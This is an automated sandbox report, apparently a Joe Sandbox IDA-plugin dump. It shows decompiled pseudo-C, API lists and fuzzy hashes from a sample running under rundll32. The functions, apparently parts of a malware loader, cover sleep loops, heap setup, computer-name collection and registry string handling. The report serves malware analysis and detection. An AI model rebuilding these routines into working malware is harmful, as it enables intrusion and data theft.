                                          • Instruction Fuzzy Hash: 1E418F72604305AFE710AFA4DC84D6FB7ECEF48604F0049AABA8DD7110D675ED0D9BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 350 4bf4ffa-4bf503c 352 4bf50c3-4bf50c9 350->352 353 4bf5042-4bf504b 350->353 354 4bf504d-4bf505e SysAllocString 353->354 355 4bf508c-4bf508f 353->355 356 4bf5069-4bf5081 354->356 357 4bf5060-4bf5067 354->357 358 4bf50ed 355->358 359 4bf5091-4bf50a1 SysAllocString 355->359 366 4bf5085-4bf508a 356->366 361 4bf50b5-4bf50b8 357->361 360 4bf50ef-4bf50f2 358->360 362 4bf50cc-4bf50eb 359->362 363 4bf50a3 359->363 364 4bf50aa-4bf50ac 360->364 365 4bf50f4-4bf5101 360->365 361->352 367 4bf50ba-4bf50bd SysFreeString 361->367 362->360 363->364 364->361 368 4bf50ae-4bf50af SysFreeString 364->368 365->352 366->355 366->361 367->352 368->361
                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04BF5057
                                          • SysAllocString.OLEAUT32(04BFA6F4), ref: 04BF509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF50AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF50BD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 35d127b1161e912562f9eb6a41809cf2810accc5d1df7c2dc9e8434bfc874e44
                                          • Instruction ID: 8176fbbff1c76d3c330b125dddb5316113a77bc157ef1df7df0294b85e138beb
                                          • Opcode Fuzzy Hash: 35d127b1161e912562f9eb6a41809cf2810accc5d1df7c2dc9e8434bfc874e44
                                          • Instruction Fuzzy Hash: CA31E071500209FFCB15DFB8D8849AE7BB9FF48300B10845AEA0A97251E775A985CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 370 4bf1295-4bf12a9 371 4bf12ae-4bf12b3 370->371 372 4bf134a-4bf1351 371->372 373 4bf12b9-4bf12bc 371->373 374 4bf12be-4bf12d3 Sleep 373->374 375 4bf12d6-4bf12d9 373->375 374->375 375->372 376 4bf12db-4bf12e0 375->376 378 4bf133d-4bf1348 376->378 379 4bf12e2-4bf12f4 376->379 378->372 381 4bf12f6-4bf1303 lstrlenW 379->381 382 4bf1334-4bf1339 379->382 381->382 383 4bf1305-4bf1313 call 4bf58be 381->383 382->378 386 4bf1315-4bf1322 memcpy 383->386 387 4bf1324 383->387 388 4bf132b-4bf132e SysFreeString 386->388 387->388 388->382
                                          C-Code - Quality: 78%
                                          			E04BF1295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0; // executed
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E04BF58BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: e0b2f3763f989949b45addc297e6e2395fc55b4a1c42278267776d5f7f2b32c7
                                          • Instruction ID: 409b0dce9b842d8521392a5ab4e183d641a263e7e14d4cc46b4c36c5a30acb9b
                                          • Opcode Fuzzy Hash: e0b2f3763f989949b45addc297e6e2395fc55b4a1c42278267776d5f7f2b32c7
                                          • Instruction Fuzzy Hash: F6214175901209FFDB11DFA8C8849DEBBB8FF48304B1045A9EA49E7200E730EE45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 389 4bf90a1-4bf90b7 HeapCreate 390 4bf90be-4bf90d4 GetTickCount call 4bf6a7f 389->390 391 4bf90b9-4bf90bc 389->391 392 4bf911c 390->392 395 4bf90d6-4bf90d7 390->395 391->392 396 4bf90d8-4bf9100 SwitchToThread call 4bf1c04 Sleep 395->396 399 4bf9102-4bf910b call 4bf9511 396->399 402 4bf910d 399->402 403 4bf9117 call 4bf4908 399->403 402->403 403->392
                                          C-Code - Quality: 100%
                                          			E04BF90A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				signed int _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x4bfd238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0x4bfd1a8 = GetTickCount();
                                          				_t7 = E04BF6A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E04BF1C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E04BF9511(_t15) != 0) {
                                          						 *0x4bfd260 = 1; // executed
                                          					}
                                          					_t13 = E04BF4908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}

                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04BF6F11,?), ref: 04BF90AA
                                          • GetTickCount.KERNEL32 ref: 04BF90BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 04BF90D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 04BF90F7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 3effdb8f17562837a60fe3f9713a1ff9d44b729091628c2d00eef4b4fee37f1e
                                          • Instruction ID: 8bce156886645c4a1179dbe1faf4677521651293b626b197b44c0cce482400a0
                                          • Opcode Fuzzy Hash: 3effdb8f17562837a60fe3f9713a1ff9d44b729091628c2d00eef4b4fee37f1e
                                          • Instruction Fuzzy Hash: 99F062B1600304BAEB116F789C48B9A7AA8FF54759F104062EE0DD7240EB38E99A8675
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 405 4bf68cf-4bf68e9 call 4bf9138 408 4bf68ee-4bf6907 call 4bf1b13 405->408 409 4bf68eb 405->409 411 4bf690c-4bf6910 408->411 409->408 412 4bf69cf-4bf69d4 411->412 413 4bf6916-4bf6930 StrToIntExW 411->413 416 4bf69db-4bf69e1 412->416 417 4bf69d6 call 4bf568a 412->417 414 4bf69bf-4bf69c1 413->414 415 4bf6936-4bf6952 call 4bf5fcb 413->415 420 4bf69c2-4bf69cd HeapFree 414->420 415->420 422 4bf6954-4bf696d call 4bf75e7 415->422 417->416 420->412 425 4bf698f-4bf69bd call 4bf1bc1 HeapFree 422->425 426 4bf696f-4bf6976 422->426 425->420 426->425 427 4bf6978-4bf698a call 4bf75e7 426->427 427->425
                                          C-Code - Quality: 100%
                                          			E04BF68CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E04BF9138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t4 = _t24 + 0x4bfede0; // 0x70d9388
                                          				_t5 = _t24 + 0x4bfed88; // 0x4f0053
                                          				_t26 = E04BF1B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x4bfd2a4; // 0x24da5a8
                                          						_t11 = _t32 + 0x4bfedd4; // 0x70d937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x4bfed88; // 0x4f0053
                                          						_t51 = E04BF5FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0x4bfd2a4; // 0x24da5a8
                                          							_t13 = _t35 + 0x4bfea59; // 0x30314549
                                          							if(E04BF75E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0x4bfd25c - 6;
                                          								if( *0x4bfd25c <= 6) {
                                          									_t42 =  *0x4bfd2a4; // 0x24da5a8
                                          									_t15 = _t42 + 0x4bfec3a; // 0x52384549
                                          									E04BF75E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x4bfd2a4; // 0x24da5a8
                                          							_t17 = _t38 + 0x4bfee18; // 0x70d93c0
                                          							_t18 = _t38 + 0x4bfedf0; // 0x680043
                                          							_t45 = E04BF1BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                          							HeapFree( *0x4bfd238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0x4bfd238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E04BF568A(_t53);
                                          				}
                                          				return _t45;
                                          			}

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,070D9388,00000000,?,7519F710,00000000,7519F730), ref: 04BF691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070D93C0,?,00000000,30314549,00000014,004F0053,070D937C), ref: 04BF69BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04BF9C10), ref: 04BF69CD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 800365ed6c9bd4e13ea491b0d0c32f5ddb02ec36cd185c14fe2ba265c59e73b5
                                          • Instruction ID: 2fef29fe951dade3db725aa00a75cd802bf09236a5d99e31b5a395e05f40cf50
                                          • Opcode Fuzzy Hash: 800365ed6c9bd4e13ea491b0d0c32f5ddb02ec36cd185c14fe2ba265c59e73b5
                                          • Instruction Fuzzy Hash: 54316231600119BEEB119B94DC48EAA7BBDEB48704F054096B60D9B120D770EE19DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04BF9F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0x4bfd2a4; // 0x24da5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x4bfd238);
                                          				_t1 = _t43 + 0x4bfe791; // 0x6976612e
                                          				_t44 = _t1;
                                          				if( *0x4bfd24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0x4bfd24c =  *0x4bfd24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E04BF7CF7(_a4, _t41); // executed
                                          						_t19 = E04BF60CF(_t41, _t41, _t46); // executed
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0x4bfd24c < 5) {
                                          								 *0x4bfd24c =  *0x4bfd24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E04BF6106();
                                          						RtlFreeHeap( *0x4bfd238, 0, _t41); // executed
                                          						goto L10;
                                          					}
                                          					_t25 = E04BF514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				if(RtlAllocateHeap() == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E04BF1754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04BF9F3B
                                            • Part of subcall function 04BF1754: GetTickCount.KERNEL32 ref: 04BF1768
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF17B8
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF17D5
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF1801
                                            • Part of subcall function 04BF1754: HeapFree.KERNEL32(00000000,?), ref: 04BF1813
                                            • Part of subcall function 04BF1754: wsprintfA.USER32 ref: 04BF1834
                                            • Part of subcall function 04BF1754: HeapFree.KERNEL32(00000000,?), ref: 04BF1844
                                            • Part of subcall function 04BF1754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BF1872
                                            • Part of subcall function 04BF1754: GetTickCount.KERNEL32 ref: 04BF1883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04BF9F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04BF9C62,00000002,?,?,?,?), ref: 04BF9FB6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: c38025c54a33b074ba0ec7960b208aeefe24559bc5cfc63f0cb8daf8b7ab8066
                                          • Instruction ID: 000d656eceda7568ad0c7c750b7f48664f10e55144acd9d315c8b46dd9937845
                                          • Opcode Fuzzy Hash: c38025c54a33b074ba0ec7960b208aeefe24559bc5cfc63f0cb8daf8b7ab8066
                                          • Instruction Fuzzy Hash: 8F213EB5200205EBEB119FA9DC44B9A77ACEB49344F104056FA0ED7241E774FE49DBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E04BF642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E04BF4FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x4bfd2a4; // 0x24da5a8
                                          						_t20 = _t68 + 0x4bfe1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E04BF5103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}






















                                          APIs
                                            • Part of subcall function 04BF4FFA: SysAllocString.OLEAUT32(80000002), ref: 04BF5057
                                            • Part of subcall function 04BF4FFA: SysFreeString.OLEAUT32(00000000), ref: 04BF50BD
                                          • SysFreeString.OLEAUT32(?), ref: 04BF650B
                                          • SysFreeString.OLEAUT32(04BFA6F4), ref: 04BF6515
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: fe253642279286d9dc7e9fc9b9fa031aa1251dc23fe2ca60b095c393b5249671
                                          • Instruction ID: ecc385c1567925d62e98dbeee2fdc0edf25f78304835ff6c5011ab03fc6b8cea
                                          • Opcode Fuzzy Hash: fe253642279286d9dc7e9fc9b9fa031aa1251dc23fe2ca60b095c393b5249671
                                          • Instruction Fuzzy Hash: A7314A71500159AFCB21EF68CC88C9BBB79FFC97447154698FD099B214E231ED56CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04BF73E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E04BF58BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E04BF147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}










                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04BF51DC,7519F710,00000000,?,?,04BF51DC), ref: 04BF7401
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04BF51DC,04BF51DD,?,?,04BF51DC), ref: 04BF741E
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 90971c1f82fb7dcc136a0fe0890e268b914e7bc22ea4228df6852471704be344
                                          • Instruction ID: a1394439044bf433624350bcd7934cd9f02245e537602199b613ead33b43d51c
                                          • Opcode Fuzzy Hash: 90971c1f82fb7dcc136a0fe0890e268b914e7bc22ea4228df6852471704be344
                                          • Instruction Fuzzy Hash: 8DF05426600149BBE711DABD8D00EAF7ABDDBC5650F6100D9AA1CD3240EE74EF0996B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E04BF7BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t4 = _t15 + 0x4bfe39c; // 0x70d8944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x4bfe124; // 0x650047
                                          				_t17 = E04BF642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E04BF4CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}











                                          APIs
                                            • Part of subcall function 04BF642C: SysFreeString.OLEAUT32(?), ref: 04BF650B
                                            • Part of subcall function 04BF4CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04BF358E,004F0053,00000000,?), ref: 04BF4CDC
                                            • Part of subcall function 04BF4CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04BF358E,004F0053,00000000,?), ref: 04BF4D06
                                            • Part of subcall function 04BF4CD3: memset.NTDLL ref: 04BF4D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF7C0C
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 3d173aed016d5d87aa4115a7b1f90fb70ef92907ab3122f53b619eefb4c65608
                                          • Instruction ID: 014a715a969b74ca80832529da89305aa1a2bc2dc89a3475304a582cada03586
                                          • Opcode Fuzzy Hash: 3d173aed016d5d87aa4115a7b1f90fb70ef92907ab3122f53b619eefb4c65608
                                          • Instruction Fuzzy Hash: B801713150011ABFDB119FA8CD049ABBBB9FB04254F0145A5EA09E7161F7B1E96AC7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF58BE(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0x4bfd238, 0, _a4); // executed
                                          				return _t2;
                                          			}





                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: b45e5fce67b0cd3ebe6dbfba7741f391f495206c8f72cbe60950d842800ecc63
                                          • Instruction ID: 89ec3acc51042e13d6b26bbbc9a25097c1598c4c0f2a570ede81dcff465f1578
